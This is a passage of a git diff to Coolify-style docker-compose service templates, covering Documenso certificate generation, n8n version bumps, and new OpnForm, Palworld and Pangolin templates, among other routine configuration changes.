Save original working directory + ORIGINAL_DIR="$$(pwd)" + + # Find openssl binary (should be available in v1.12.10+) + OPENSSL_CMD="$$(which openssl 2>/dev/null || command -v openssl 2>/dev/null || echo '/usr/bin/openssl')" + + # Verify openssl is available + if ! $$OPENSSL_CMD version >/dev/null 2>&1; then + echo "Error: OpenSSL not found. Please use Documenso image v1.12.10 or later." + exit 1 + fi + + # Create certificate directory - use /app/certs (writable by user 1001) + CERT_DIR="/app/certs" + mkdir -p "$$CERT_DIR" || { + # Fallback to tmp if app directory not writable + CERT_DIR="/tmp/certs" + mkdir -p "$$CERT_DIR" + echo "Warning: Using fallback directory: $$CERT_DIR" + } + + # Create passphrase file for secure handling (prevents exposure in process list) + # This avoids shell word-splitting issues and prevents passphrase from appearing in ps/process list + echo -n "$$CERT_PASSPHRASE" > "$$PASSPHRASE_FILE" + chmod 600 "$$PASSPHRASE_FILE" + touch /tmp/cert_info_path cat < /tmp/cert_info_path [ req ] @@ -68,31 +97,43 @@ services: emailAddress = ${CERT_INFO_EMAIL} EOF - cat < "$(cat /tmp/cert_script_path)" - mkdir -p "$(cat /tmp/certs_dir_path)" && cd "$(cat /tmp/certs_dir_path)" - - openssl genrsa -out private.key 2048 - - openssl req \ + cd "$$CERT_DIR" + + $$OPENSSL_CMD genrsa -out private.key 2048 + + $$OPENSSL_CMD req \ -new \ -x509 \ -key private.key \ -out certificate.crt \ - -days ${CERT_VALID_DAYS} \ + -days $${CERT_VALID_DAYS} \ -config /tmp/cert_info_path - - openssl pkcs12 \ + + # Create P12 certificate using file-based passphrase (prevents exposure in process list) + # Private key is not encrypted, so we only need -passout (not -passin) + $$OPENSSL_CMD pkcs12 \ -export \ - -out certificate.p12 \ + -out cert.p12 \ -inkey private.key \ -in certificate.crt \ -legacy \ - -password file:/tmp/cert_pass - EOF - chmod +x "$(cat /tmp/cert_script_path)" - - sh "$(cat /tmp/cert_script_path)" - + -passout file:"$$PASSPHRASE_FILE" + + # Clean up passphrase file immediately after use + rm -f "$$PASSPHRASE_FILE" + + # Set permissions (may fail if not root, but will work in Coolify) + chown 1001:1001 cert.p12 private.key certificate.crt 2>/dev/null || true + chmod 400 cert.p12 private.key certificate.crt + + # Update environment variable if directory changed + if [ "$$CERT_DIR" != "/app/certs" ]; then + export NEXT_PRIVATE_SIGNING_LOCAL_FILE_PATH="$$CERT_DIR/cert.p12" + fi + + # Return to original directory before starting application + cd "$$ORIGINAL_DIR" + ./start.sh database: @@ -107,4 +148,4 @@ services: test: ["CMD-SHELL", "pg_isready -U $${POSTGRES_USER} -d $${POSTGRES_DB}"] interval: 5s timeout: 20s - retries: 10 + retries: 10 \ No newline at end of file diff --git a/templates/compose/embystat.yaml b/templates/compose/embystat.yaml index 957f67dfb..84e25d4a8 100644 --- a/templates/compose/embystat.yaml +++ b/templates/compose/embystat.yaml @@ -1,7 +1,7 @@ # documentation: https://github.com/mregni/EmbyStat # slogan: EmbyStat is a web analytics tool, designed to provide insight into website traffic and user behavior. -# category: media -# tags: media, server, movies, tv, music +# category: analytics +# tags: analytics, insights, statistics, web, traffic # port: 6555 services: diff --git a/templates/compose/ghost.yaml b/templates/compose/ghost.yaml index 695b965e7..85464d731 100644 --- a/templates/compose/ghost.yaml +++ b/templates/compose/ghost.yaml @@ -12,7 +12,7 @@ services: - ghost-content-data:/var/lib/ghost/content environment: - SERVICE_URL_GHOST_2368 - - url=$SERVICE_URL_GHOST_2368 + - url=$SERVICE_URL_GHOST - database__client=mysql - database__connection__host=mysql - database__connection__user=$SERVICE_USER_MYSQL diff --git a/templates/compose/mosquitto.yaml b/templates/compose/mosquitto.yaml index 4c417e746..e52eca84a 100644 --- a/templates/compose/mosquitto.yaml +++ b/templates/compose/mosquitto.yaml @@ -34,7 +34,7 @@ services: fi && echo ''require_certificate ''$REQUIRE_CERTIFICATE >> /mosquitto/config/mosquitto.conf && echo ''allow_anonymous ''$ALLOW_ANONYMOUS >> /mosquitto/config/mosquitto.conf; - if [ -n ''$SERVICE_USER_MOSQUITTO''] && [ -n ''$SERVICE_PASSWORD_MOSQUITTO'' ]; then + if [ -n ''$SERVICE_USER_MOSQUITTO'' ] && [ -n ''$SERVICE_PASSWORD_MOSQUITTO'' ]; then echo ''password_file /mosquitto/config/passwords'' >> /mosquitto/config/mosquitto.conf && touch /mosquitto/config/passwords && chmod 0700 /mosquitto/config/passwords && diff --git a/templates/compose/n8n-with-postgres-and-worker.yaml b/templates/compose/n8n-with-postgres-and-worker.yaml index 5f6aa5e50..fec28860e 100644 --- a/templates/compose/n8n-with-postgres-and-worker.yaml +++ b/templates/compose/n8n-with-postgres-and-worker.yaml @@ -7,7 +7,7 @@ services: n8n: - image: docker.n8n.io/n8nio/n8n:1.114.4 + image: docker.n8n.io/n8nio/n8n:1.119.2 environment: - SERVICE_URL_N8N_5678 - N8N_EDITOR_BASE_URL=${SERVICE_URL_N8N} @@ -46,7 +46,7 @@ services: retries: 10 n8n-worker: - image: docker.n8n.io/n8nio/n8n:1.114.4 + image: docker.n8n.io/n8nio/n8n:1.119.2 command: worker environment: - GENERIC_TIMEZONE=${GENERIC_TIMEZONE:-Europe/Berlin} diff --git a/templates/compose/n8n-with-postgresql.yaml b/templates/compose/n8n-with-postgresql.yaml index 1a1592f79..94648e958 100644 --- a/templates/compose/n8n-with-postgresql.yaml +++ b/templates/compose/n8n-with-postgresql.yaml @@ -7,7 +7,7 @@ services: n8n: - image: docker.n8n.io/n8nio/n8n:1.114.4 + image: docker.n8n.io/n8nio/n8n:1.119.2 environment: - SERVICE_URL_N8N_5678 - N8N_EDITOR_BASE_URL=${SERVICE_URL_N8N} diff --git a/templates/compose/n8n.yaml b/templates/compose/n8n.yaml index 3078516a5..4e886b408 100644 --- a/templates/compose/n8n.yaml +++ b/templates/compose/n8n.yaml @@ -7,7 +7,7 @@ services: n8n: - image: docker.n8n.io/n8nio/n8n:1.114.4 + image: docker.n8n.io/n8nio/n8n:1.119.2 environment: - SERVICE_URL_N8N_5678 - N8N_EDITOR_BASE_URL=${SERVICE_URL_N8N} diff --git a/templates/compose/netbird-client.yaml b/templates/compose/netbird-client.yaml index a7c3f1fb6..4bc5e32e0 100644 --- a/templates/compose/netbird-client.yaml +++ b/templates/compose/netbird-client.yaml @@ -7,6 +7,7 @@ services: netbird-client: image: 'netbirdio/netbird:latest' + network_mode: host environment: - 'NB_SETUP_KEY=${NB_SETUP_KEY}' - 'NB_ENABLE_ROSENPASS=${NB_ENABLE_ROSENPASS:-false}' diff --git a/templates/compose/newt-pangolin.yaml b/templates/compose/newt-pangolin.yaml new file mode 100644 index 000000000..7e2db3253 --- /dev/null +++ b/templates/compose/newt-pangolin.yaml @@ -0,0 +1,17 @@ +# documentation: https://docs.digpangolin.com/manage/sites/install-site +# slogan: Pangolin tunnels your services to the internet so you can access anything from anywhere. +# tags: wireguard, reverse-proxy, zero-trust-network-access, open source +# logo: svgs/pangolin-logo.png + +services: + newt: + image: fosrl/newt:latest + environment: + - PANGOLIN_ENDPOINT=${PANGOLIN_ENDPOINT:-https://pangolin.domain.tld} + - NEWT_ID=${NEWT_ID:?} + - NEWT_SECRET=${NEWT_SECRET:?} + healthcheck: + test: ["CMD", "newt", "--version"] + interval: 5s + timeout: 20s + retries: 10 diff --git a/templates/compose/openpanel.yaml b/templates/compose/openpanel.yaml index 4167dab0b..676ae0356 100644 --- a/templates/compose/openpanel.yaml +++ b/templates/compose/openpanel.yaml @@ -76,6 +76,7 @@ services: openpanel-worker: image: lindesvard/openpanel-worker:latest environment: + - DISABLE_BULLBOARD=${DISABLE_BULLBOARD:-1} - NODE_ENV=production - NEXT_PUBLIC_SELF_HOSTED=true - SERVICE_URL_OPBULLBOARD diff --git a/templates/compose/opnform.yaml b/templates/compose/opnform.yaml new file mode 100644 index 000000000..8b4bbe3f5 --- /dev/null +++ b/templates/compose/opnform.yaml @@ -0,0 +1,228 @@ +# documentation: https://docs.opnform.com/introduction +# slogan: OpnForm is an open-source form builder that lets you create beautiful forms and share them anywhere. It's super fast, you don't need to know how to code +# tags: opnform, form, survey, cloud, open-source, self-hosted, docker, no-code, embeddable +# logo: svg/opnform.svg +# port: 80 + +x-shared-env: &shared-api-env + APP_NAME: "OpnForm" + APP_ENV: production + APP_KEY: ${SERVICE_BASE64_APIKEY} + APP_DEBUG: ${APP_DEBUG:-false} + APP_URL: ${SERVICE_URL_NGINX} + LOG_CHANNEL: errorlog + LOG_LEVEL: ${LOG_LEVEL:-debug} + FILESYSTEM_DRIVER: ${FILESYSTEM_DRIVER:-local} + LOCAL_FILESYSTEM_VISIBILITY: public + CACHE_DRIVER: redis + QUEUE_CONNECTION: redis + SESSION_DRIVER: redis + SESSION_LIFETIME: 120 + MAIL_MAILER: ${MAIL_MAILER:-log} + MAIL_HOST: ${MAIL_HOST} + MAIL_PORT: ${MAIL_PORT} + MAIL_USERNAME: ${MAIL_USERNAME:-your@email.com} + MAIL_PASSWORD: ${MAIL_PASSWORD} + MAIL_ENCRYPTION: ${MAIL_ENCRYPTION} + MAIL_FROM_ADDRESS: ${MAIL_FROM_ADDRESS:-your@email.com} + MAIL_FROM_NAME: ${MAIL_FROM_NAME:-OpnForm} + AWS_ACCESS_KEY_ID: ${AWS_ACCESS_KEY_ID} + AWS_SECRET_ACCESS_KEY: ${AWS_SECRET_ACCESS_KEY} + AWS_DEFAULT_REGION: ${AWS_DEFAULT_REGION:-us-east-1} + AWS_BUCKET: ${AWS_BUCKET} + OPEN_AI_API_KEY: ${OPEN_AI_API_KEY} + TELEGRAM_BOT_ID: ${TELEGRAM_BOT_ID} + TELEGRAM_BOT_TOKEN: ${TELEGRAM_BOT_TOKEN} + REDIS_HOST: redis + REDIS_PASSWORD: ${SERVICE_PASSWORD_64_REDIS} + # Database settings + DB_HOST: postgresql + DB_DATABASE: ${POSTGRESQL_DATABASE:-opnform} + DB_USERNAME: ${SERVICE_USER_POSTGRESQL} + DB_PASSWORD: ${SERVICE_PASSWORD_POSTGRESQL} + DB_CONNECTION: pgsql + # PHP Configuration + PHP_MEMORY_LIMIT: "1G" + PHP_MAX_EXECUTION_TIME: "600" + PHP_UPLOAD_MAX_FILESIZE: "64M" + PHP_POST_MAX_SIZE: "64M" + +services: + opnform-api: + image: jhumanj/opnform-api:1.12.1 + volumes: + - api-storage:/usr/share/nginx/html/storage + environment: + # Use the shared environment variables. + <<: *shared-api-env + JWT_TTL: ${JWT_TTL:-1440} + JWT_SECRET: ${SERVICE_PASSWORD_JWTSECRET} + JWT_SKIP_IP_UA_VALIDATION: ${JWT_SKIP_IP_UA_VALIDATION:-true} + H_CAPTCHA_SITE_KEY: ${H_CAPTCHA_SITE_KEY} + H_CAPTCHA_SECRET_KEY: ${H_CAPTCHA_SECRET_KEY} + RE_CAPTCHA_SITE_KEY: ${RE_CAPTCHA_SITE_KEY} + RE_CAPTCHA_SECRET_KEY: ${RE_CAPTCHA_SECRET_KEY} + SHOW_OFFICIAL_TEMPLATES: ${SHOW_OFFICIAL_TEMPLATES:-true} + depends_on: + postgresql: + condition: service_healthy + redis: + condition: service_healthy + healthcheck: + test: ["CMD-SHELL", "php /usr/share/nginx/html/artisan about || exit 1"] + interval: 30s + timeout: 15s + retries: 3 + start_period: 60s + + api-worker: + image: jhumanj/opnform-api:1.12.1 + volumes: + - api-storage:/usr/share/nginx/html/storage + environment: + # Use the shared environment variables. + <<: *shared-api-env + command: ["php", "artisan", "queue:work"] + depends_on: + postgresql: + condition: service_healthy + redis: + condition: service_healthy + healthcheck: + test: + ["CMD-SHELL", "pgrep -f 'php artisan queue:work' > /dev/null || exit 1"] + interval: 60s + timeout: 10s + retries: 3 + start_period: 30s + + api-scheduler: + image: jhumanj/opnform-api:1.12.1 + volumes: + - api-storage:/usr/share/nginx/html/storage + environment: + # Use the shared environment variables. + <<: *shared-api-env + command: ["php", "artisan", "schedule:work"] + depends_on: + postgresql: + condition: service_healthy + redis: + condition: service_healthy + healthcheck: + test: + [ + "CMD-SHELL", + "php /usr/share/nginx/html/artisan app:scheduler-status --mode=check --max-minutes=3 || exit 1", + ] + interval: 60s + timeout: 30s + retries: 3 + start_period: 70s # Allow time for first scheduled run and cache write + + opnform-ui: + image: jhumanj/opnform-client:1.12.1 + environment: + - NUXT_PUBLIC_APP_URL=/ + - NUXT_PUBLIC_API_BASE=/api + - NUXT_PRIVATE_API_BASE=http://nginx/api + - NUXT_PUBLIC_ENV=production + - NUXT_PUBLIC_H_CAPTCHA_SITE_KEY=${H_CAPTCHA_SITE_KEY} + - NUXT_PUBLIC_RE_CAPTCHA_SITE_KEY=${RE_CAPTCHA_SITE_KEY} + healthcheck: + test: + ["CMD-SHELL", "wget --spider -q http://opnform-ui:3000/login || exit 1"] + interval: 30s + timeout: 10s + retries: 3 + start_period: 45s + depends_on: + opnform-api: + condition: service_healthy + + postgresql: + image: postgres:16 + volumes: + - opnform-postgresql-data:/var/lib/postgresql/data + environment: + - POSTGRES_USER=${SERVICE_USER_POSTGRESQL} + - POSTGRES_PASSWORD=${SERVICE_PASSWORD_POSTGRESQL} + - POSTGRES_DB=${POSTGRESQL_DATABASE:-opnform} + healthcheck: + test: ["CMD-SHELL", "pg_isready -U $${POSTGRES_USER} -d $${POSTGRES_DB}"] + interval: 5s + timeout: 20s + retries: 10 + + redis: + image: redis:7 + environment: + - REDIS_PASSWORD=${SERVICE_PASSWORD_64_REDIS} + volumes: + - redis-data:/data + command: ["redis-server", "--requirepass", "${SERVICE_PASSWORD_64_REDIS}"] + healthcheck: + test: ["CMD", "redis-cli", "-a", "${SERVICE_PASSWORD_64_REDIS}", "PING"] + interval: 10s + timeout: 30s + retries: 3 + + # The nginx reverse proxy. + # used for reverse proxying the API service and Web service. + nginx: + image: nginx:1.29.2 + environment: + - SERVICE_URL_NGINX + volumes: + - type: bind + source: ./nginx/nginx.conf + target: /etc/nginx/conf.d/default.conf + read_only: true + content: | + map $original_uri $api_uri { + ~^/api(/.*$) $1; + default $original_uri; + } + + server { + listen 80 default_server; + root /usr/share/nginx/html/public; + + access_log /dev/stdout; + error_log /dev/stderr error; + + index index.html index.htm index.php; + + location / { + proxy_http_version 1.1; + proxy_pass http://opnform-ui:3000; + proxy_set_header X-Real-IP $remote_addr; + proxy_set_header X-Forwarded-Host $host; + proxy_set_header X-Forwarded-Port $server_port; + proxy_set_header Upgrade $http_upgrade; + proxy_set_header Connection "Upgrade"; + } + + location ~/(api|open|local\/temp|forms\/assets)/ { + set $original_uri $uri; + try_files $uri $uri/ /index.php$is_args$args; + } + + location ~ \.php$ { + fastcgi_split_path_info ^(.+\.php)(/.+)$; + fastcgi_pass opnform-api:9000; + fastcgi_index index.php; + include fastcgi_params; + fastcgi_param SCRIPT_FILENAME /usr/share/nginx/html/public/index.php; + fastcgi_param REQUEST_URI $api_uri; + } + } + depends_on: + - opnform-api + - opnform-ui + healthcheck: + test: ["CMD", "nginx", "-t"] + interval: 30s + timeout: 10s + retries: 3 + start_period: 40s diff --git a/templates/compose/palworld.yaml b/templates/compose/palworld.yaml new file mode 100644 index 000000000..4875d16f8 --- /dev/null +++ b/templates/compose/palworld.yaml @@ -0,0 +1,128 @@ +services: + palworld: + image: thijsvanloef/palworld-server-docker:v1.4.6 + stop_grace_period: 30s + ports: + - '8211:8211/udp' + - '27015:27015/udp' + volumes: + - 'palworld-data:/palworld/' + environment: + - 'TZ=${TZ:?UTC}' + - 'PUID=${PUID:?1000}' + - 'PGID=${PGID:?1000}' + - 'MULTITHREADING=${MULTITHREADING:?false}' + - 'MAX_PLAYERS=${PLAYERS:?16}' + - 'SERVER_NAME=${SERVER_NAME:?palworld-server-docker by Thijs van Loef via Coolify}' + - 'SERVER_DESCRIPTION=${SERVER_DESCRIPTION:?palworld-server-docker by Thijs van Loef via Coolify}' + - 'SERVER_PASSWORD=${SERVER_PASSWORD:?worldofpals}' + - 'ADMIN_PASSWORD=${ADMIN_PASSWORD:-adminPassword}' + - 'COMMUNITY=${COMMUNITY:?false}' + - 'PUBLIC_IP=${PUBLIC_IP:-}' + - 'PUBLIC_PORT=${PUBLIC_PORT:?8211}' + - 'PORT=${PORT:?8211}' + - 'QUERY_PORT=${QUERY_PORT:?27015}' + - 'UPDATE_ON_BOOT=${UPDATE_ON_BOOT:?true}' + - 'RCON_ENABLED=${RCON_ENABLED:?true}' + - 'RCON_PORT=${RCON_PORT:?25575}' + - 'BACKUP_ENABLED=${BACKUP_ENABLED:?true}' + - 'DELETE_OLD_BACKUPS=${DELETE_OLD_BACKUPS:?false}' + - 'OLD_BACKUP_DAYS=${OLD_BACKUP_DAYS:?30}' + - 'BACKUP_CRON_EXPRESSION=${BACKUP_CRON_EXPRESSION:?0 0 * * *}' + - 'AUTO_UPDATE_ENABLED=${AUTO_UPDATE_ENABLED:?false}' + - 'AUTO_UPDATE_CRON_EXPRESSION=${AUTO_UPDATE_CRON_EXPRESSION:?0 * * * *}' + - 'AUTO_UPDATE_WARN_MINUTES=${AUTO_UPDATE_WARN_MINUTES:?30}' + - 'AUTO_REBOOT_ENABLED=${AUTO_REBOOT_ENABLED:?false}' + - 'AUTO_REBOOT_EVEN_IF_PLAYERS_ONLINE=${AUTO_REBOOT_EVEN_IF_PLAYERS_ONLINE:?false}' + - 'AUTO_REBOOT_WARN_MINUTES=${AUTO_REBOOT_WARN_MINUTES:?5}' + - 'AUTO_REBOOT_CRON_EXPRESSION=${AUTO_REBOOT_CRON_EXPRESSION:?0 0 * * *}' + - 'AUTO_PAUSE_ENABLED=${AUTO_PAUSE_ENABLED:?false}' + - 'AUTO_PAUSE_TIMEOUT_EST=${AUTO_PAUSE_TIMEOUT_EST:?180}' + - 'AUTO_PAUSE_LOG=${AUTO_PAUSE_LOG:?true}' + - 'AUTO_PAUSE_DEBUG=${AUTO_PAUSE_DEBUG:?false}' + - 'ENABLE_PLAYER_LOGGING=${ENABLE_PLAYER_LOGGING:?true}' + - 'PLAYER_LOGGING_POLL_PERIOD=${PLAYER_LOGGING_POLL_PERIOD:?5}' + - 'DIFFICULTY=${DIFFICULTY:?None}' + - 'RANDOMIZER_TYPE=${RANDOMIZER_TYPE:-}' + - 'RANDOMIZER_SEED=${RANDOMIZER_SEED:?none}' + - 'DAYTIME_SPEEDRATE=${DAYTIME_SPEEDRATE:?1.000000}' + - 'NIGHTTIME_SPEEDRATE=${NIGHTTIME_SPEEDRATE:?1.000000}' + - 'EXP_RATE=${EXP_RATE:?1.000000}' + - 'PAL_CAPTURE_RATE=${PAL_CAPTURE_RATE:?1.000000}' + - 'PAL_SPAWN_NUM_RATE=${PAL_SPAWN_NUM_RATE:?1.000000}' + - 'PAL_DAMAGE_RATE_ATTACK=${PAL_DAMAGE_RATE_ATTACK:?1.000000}' + - 'PAL_DAMAGE_RATE_DEFENSE=${PAL_DAMAGE_RATE_DEFENSE:?1.000000}' + - 'PLAYER_DAMAGE_RATE_ATTACK=${PLAYER_DAMAGE_RATE_ATTACK:?1.000000}' + - 'PLAYER_DAMAGE_RATE_DEFENSE=${PLAYER_DAMAGE_RATE_DEFENSE:?1.000000}' + - 'PLAYER_STOMACH_DECREASE_RATE=${PLAYER_STOMACH_DECREASE_RATE:?1.000000}' + - 'PLAYER_STAMINA_DECREASE_RATE=${PLAYER_STAMINA_DECREASE_RATE:?1.000000}' + - 'PLAYER_AUTO_HP_REGEN_RATE=${PLAYER_AUTO_HP_REGEN_RATE:?1.000000}' + - 'PLAYER_AUTO_HP_REGEN_RATE_IN_SLEEP=${PLAYER_AUTO_HP_REGEN_RATE_IN_SLEEP:?1.000000}' + - 'PAL_STOMACH_DECREASE_RATE=${PAL_STOMACH_DECREASE_RATE:?1.000000}' + - 'PAL_STAMINA_DECREASE_RATE=${PAL_STAMINA_DECREASE_RATE:?1.000000}' + - 'PAL_AUTO_HP_REGEN_RATE=${PAL_AUTO_HP_REGEN_RATE:?1.000000}' + - 'PAL_AUTO_HP_REGEN_RATE_IN_SLEEP=${PAL_AUTO_HP_REGEN_RATE_IN_SLEEP:?1.000000}' + - 'BUILD_OBJECT_HP_RATE=${BUILD_OBJECT_HP_RATE:?1.000000}' + - 'BUILD_OBJECT_DAMAGE_RATE=${BUILD_OBJECT_DAMAGE_RATE:?1.000000}' + - 'BUILD_OBJECT_DETERIORATION_DAMAGE_RATE=${BUILD_OBJECT_DETERIORATION_DAMAGE_RATE:?1.000000}' + - 'COLLECTION_DROP_RATE=${COLLECTION_DROP_RATE:?1.000000}' + - 'COLLECTION_OBJECT_HP_RATE=${COLLECTION_OBJECT_HP_RATE:?1.000000}' + - 'COLLECTION_OBJECT_RESPAWN_SPEED_RATE=${COLLECTION_OBJECT_RESPAWN_SPEED_RATE:?1.000000}' + - 'ENEMY_DROP_ITEM_RATE=${ENEMY_DROP_ITEM_RATE:?1.000000}' + - 'DEATH_PENALTY=${DEATH_PENALTY:?All}' + - 'ENABLE_PLAYER_TO_PLAYER_DAMAGE=${ENABLE_PLAYER_TO_PLAYER_DAMAGE:?False}' + - 'ENABLE_FRIENDLY_FIRE=${ENABLE_FRIENDLY_FIRE:?False}' + - 'ENABLE_INVADER_ENEMY=${ENABLE_INVADER_ENEMY:?True}' + - 'ACTIVE_UNKO=${ACTIVE_UNKO:?False}' + - 'ENABLE_AIM_ASSIST_PAD=${ENABLE_AIM_ASSIST_PAD:?True}' + - 'ENABLE_AIM_ASSIST_KEYBOARD=${ENABLE_AIM_ASSIST_KEYBOARD:?False}' + - 'DROP_ITEM_MAX_NUM=${DROP_ITEM_MAX_NUM:?3000}' + - 'DROP_ITEM_MAX_NUM_UNKO=${DROP_ITEM_MAX_NUM_UNKO:?100}' + - 'BASE_CAMP_MAX_NUM=${BASE_CAMP_MAX_NUM:?128}' + - 'BASE_CAMP_WORKER_MAX_NUM=${BASE_CAMP_WORKER_MAX_NUM:?15}' + - 'DROP_ITEM_ALIVE_MAX_HOURS=${DROP_ITEM_ALIVE_MAX_HOURS:?1.000000}' + - 'AUTO_RESET_GUILD_NO_ONLINE_PLAYERS=${AUTO_RESET_GUILD_NO_ONLINE_PLAYERS:?False}' + - 'AUTO_RESET_GUILD_TIME_NO_ONLINE_PLAYERS=${AUTO_RESET_GUILD_TIME_NO_ONLINE_PLAYERS:?72.000000}' + - 'GUILD_PLAYER_MAX_NUM=${GUILD_PLAYER_MAX_NUM:?20}' + - 'BASE_CAMP_MAX_NUM_IN_GUILD=${BASE_CAMP_MAX_NUM_IN_GUILD:?4}' + - 'PAL_EGG_DEFAULT_HATCHING_TIME=${PAL_EGG_DEFAULT_HATCHING_TIME:?72.000000}' + - 'WORK_SPEED_RATE=${WORK_SPEED_RATE:?1.000000}' + - 'AUTO_SAVE_SPAN=${AUTO_SAVE_SPAN:?30.000000}' + - 'IS_MULTIPLAY=${IS_MULTIPLAY:?False}' + - 'IS_PVP=${IS_PVP:?False}' + - 'HARDCORE=${HARDCORE:?False}' + - 'PAL_LOST=${PAL_LOST:?False}' + - 'CAN_PICKUP_OTHER_GUILD_DEATH_PENALTY_DROP=${CAN_PICKUP_OTHER_GUILD_DEATH_PENALTY_DROP:?False}' + - 'ENABLE_NON_LOGIN_PENALTY=${ENABLE_NON_LOGIN_PENALTY:?True}' + - 'ENABLE_FAST_TRAVEL=${ENABLE_FAST_TRAVEL:?True}' + - 'IS_START_LOCATION_SELECT_BY_MAP=${IS_START_LOCATION_SELECT_BY_MAP:?True}' + - 'EXIST_PLAYER_AFTER_LOGOUT=${EXIST_PLAYER_AFTER_LOGOUT:?False}' + - 'ENABLE_DEFENSE_OTHER_GUILD_PLAYER=${ENABLE_DEFENSE_OTHER_GUILD_PLAYER:?False}' + - 'INVISIBLE_OTHER_GUILD_BASE_CAMP_AREA_FX=${INVISIBLE_OTHER_GUILD_BASE_CAMP_AREA_FX:?False}' + - 'BUILD_AREA_LIMIT=${BUILD_AREA_LIMIT:?False}' + - 'ITEM_WEIGHT_RATE=${ITEM_WEIGHT_RATE:?1.000000}' + - 'COOP_PLAYER_MAX_NUM=${COOP_PLAYER_MAX_NUM:?4}' + - 'REGION=${REGION:-}' + - 'USEAUTH=${USEAUTH:?True}' + - 'BAN_LIST_URL=${BAN_LIST_URL:?https://api.palworldgame.com/api/banlist.txt}' + - 'REST_API_ENABLED=${REST_API_ENABLED:?False}' + - 'REST_API_PORT=${REST_API_PORT:?8212}' + - 'SHOW_PLAYER_LIST=${SHOW_PLAYER_LIST:?True}' + - 'ENABLE_PREDATOR_BOSS_PAL=${ENABLE_PREDATOR_BOSS_PAL:?True}' + - 'MAX_BUILDING_LIMIT_NUM=${MAX_BUILDING_LIMIT_NUM:?0}' + - 'SERVER_REPLICATE_PAWN_CULL_DISTANCE=${SERVER_REPLICATE_PAWN_CULL_DISTANCE:?15000.000000}' + - 'SERVER_REPLICATE_PAWN_CULL_DISTANCE_IN_BASE_CAMP=${SERVER_REPLICATE_PAWN_CULL_DISTANCE_IN_BASE_CAMP:?5000.000000}' + - 'CROSSPLAY_PLATFORMS=${CROSSPLAY_PLATFORMS:?(Steam,Xbox,PS5,Mac)}' + - 'USE_BACKUP_SAVE_DATA=${USE_BACKUP_SAVE_DATA:?True}' + - 'USE_DEPOT_DOWNLOADER=${USE_DEPOT_DOWNLOADER:?False}' + - 'INSTALL_BETA_INSIDER=${INSTALL_BETA_INSIDER:?False}' + - 'ALLOW_GLOBAL_PALBOX_EXPORT=${ALLOW_GLOBAL_PALBOX_EXPORT:?True}' + - 'ALLOW_GLOBAL_PALBOX_IMPORT=${ALLOW_GLOBAL_PALBOX_IMPORT:?False}' + - 'EQUIPMENT_DURABILITY_DAMAGE_RATE=${EQUIPMENT_DURABILITY_DAMAGE_RATE:?1.000000}' + - 'ITEM_CONTAINER_FORCE_MARK_DIRTY_INTERVAL=${ITEM_CONTAINER_FORCE_MARK_DIRTY_INTERVAL:?1.000000}' + - 'BOX64_DYNAREC_STRONGMEM=${BOX64_DYNAREC_STRONGMEM:-}' + - 'BOX64_DYNAREC_BIGBLOCK=${BOX64_DYNAREC_BIGBLOCK:-}' + - 'BOX64_DYNAREC_SAFEFLAGS=${BOX64_DYNAREC_SAFEFLAGS:-}' + - 'BOX64_DYNAREC_FASTROUND=${BOX64_DYNAREC_FASTROUND:-}' + - 'BOX64_DYNAREC_FASTNAN=${BOX64_DYNAREC_FASTNAN:-}' + - 'BOX64_DYNAREC_X87DOUBLE=${BOX64_DYNAREC_X87DOUBLE:-}' diff --git a/templates/compose/paymenter.yaml b/templates/compose/paymenter.yaml index 29f38af2e..6ce4ae3b9 100644 --- a/templates/compose/paymenter.yaml +++ b/templates/compose/paymenter.yaml @@ -7,56 +7,65 @@ services: paymenter: - image: ghcr.io/paymenter/paymenter:latest + image: 'ghcr.io/paymenter/paymenter:v1.4.5' volumes: - - app_logs:/app/storage/logs - - app_public:/app/storage/public + - 'app_logs:/app/storage/logs' + - 'extenstions:/app/extensions' + - 'themes:/app/themes' + - 'app_storage:/app/storage/app' + - 'app_public_storage:/app/storage/app/public' environment: - SERVICE_URL_PAYMENTER: ${SERVICE_URL_PAYMENTER_80} - DB_DATABASE: ${MYSQL_DATABASE:-paymenter-db} - DB_PASSWORD: ${SERVICE_PASSWORD_MYSQL} - DB_USERNAME: ${SERVICE_USER_MYSQL} + SERVICE_URL_PAYMENTER: '${SERVICE_URL_PAYMENTER_80}' + DB_DATABASE: '${MYSQL_DATABASE:-paymenter-db}' + DB_PASSWORD: '${SERVICE_PASSWORD_MYSQL}' + DB_USERNAME: '${SERVICE_USER_MYSQL}' APP_ENV: production CACHE_STORE: redis SESSION_DRIVER: redis QUEUE_CONNECTION: redis REDIS_HOST: redis REDIS_USERNAME: default - REDIS_PASSWORD: ${SERVICE_PASSWORD_64_REDIS} + REDIS_PASSWORD: '${SERVICE_PASSWORD_64_REDIS}' DB_CONNECTION: mariadb DB_HOST: mariadb DB_PORT: 3306 - APP_KEY: ${SERVICE_BASE64_KEY} + APP_KEY: '${SERVICE_BASE64_KEY}' depends_on: mariadb: condition: service_healthy redis: condition: service_started healthcheck: - test: ["CMD-SHELL", "curl -sf http://localhost:80 || exit 1"] + test: + - CMD-SHELL + - 'curl -sf http://localhost:80 || exit 1' interval: 10s timeout: 1s retries: 3 - mariadb: - image: mariadb:11 + image: 'mariadb:11.8' volumes: - - paymenter_mariadb_data:/var/lib/mysql + - 'paymenter_mariadb_data:/var/lib/mysql' environment: - - MYSQL_ROOT_PASSWORD=${SERVICE_PASSWORD_MYSQLROOT} - - MYSQL_DATABASE=${MYSQL_DATABASE:-paymenter-db} - - MYSQL_USER=${SERVICE_USER_MYSQL} - - MYSQL_PASSWORD=${SERVICE_PASSWORD_MYSQL} + - 'MYSQL_ROOT_PASSWORD=${SERVICE_PASSWORD_MYSQLROOT}' + - 'MYSQL_DATABASE=${MYSQL_DATABASE:-paymenter-db}' + - 'MYSQL_USER=${SERVICE_USER_MYSQL}' + - 'MYSQL_PASSWORD=${SERVICE_PASSWORD_MYSQL}' healthcheck: - test: ["CMD", "healthcheck.sh", "--connect", "--innodb_initialized"] + test: + - CMD + - healthcheck.sh + - '--connect' + - '--innodb_initialized' interval: 5s timeout: 20s retries: 10 - redis: - image: redis:alpine + image: 'redis:alpine' healthcheck: - test: ["CMD-SHELL", "redis-cli ping || exit 1"] + test: + - CMD-SHELL + - 'redis-cli ping || exit 1' interval: 10s timeout: 1s retries: 3 diff --git a/templates/compose/plausible.yaml b/templates/compose/plausible.yaml index 516c4f2cf..de1749e58 100644 --- a/templates/compose/plausible.yaml +++ b/templates/compose/plausible.yaml @@ -70,7 +70,7 @@ services: source: ./clickhouse/clickhouse-config.xml target: /etc/clickhouse-server/config.d/logging.xml read_only: true - content: "warningtrue" + content: 'warningtrue' - type: bind source: 